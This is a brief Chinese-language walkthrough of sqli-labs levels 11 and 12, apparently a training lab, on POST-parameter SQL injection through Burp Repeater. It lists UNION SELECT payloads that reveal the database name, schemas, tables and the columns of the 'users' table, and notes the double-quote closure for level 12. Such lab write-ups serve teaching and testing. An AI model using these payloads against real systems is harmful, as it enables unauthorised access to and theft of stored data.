我们依然是用burp进行拦截,到repeater通过修改post参数进行注入
首先随便输入一组参数让burp进行拦截
输入' union select 1,database() --+来显示数据库名
查看所有数据库:' union select 1,group_concat(schema_name) from information_schema.schemata --+
查看数据库中所有表:' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' --+
查看user中所有字段:' union select 1, group_concat(column_name)from information_schema.columns where table_name = 'users' and table_schema= 'security' --+
Less-12 POST - Error Based - Double quotes- String-with twist
输入“)union select 1,database() - - +查找出数据库名,以下步骤与Less11相同,只不过这一关为双引号闭合,把上一关中 ' 改为 ") 即可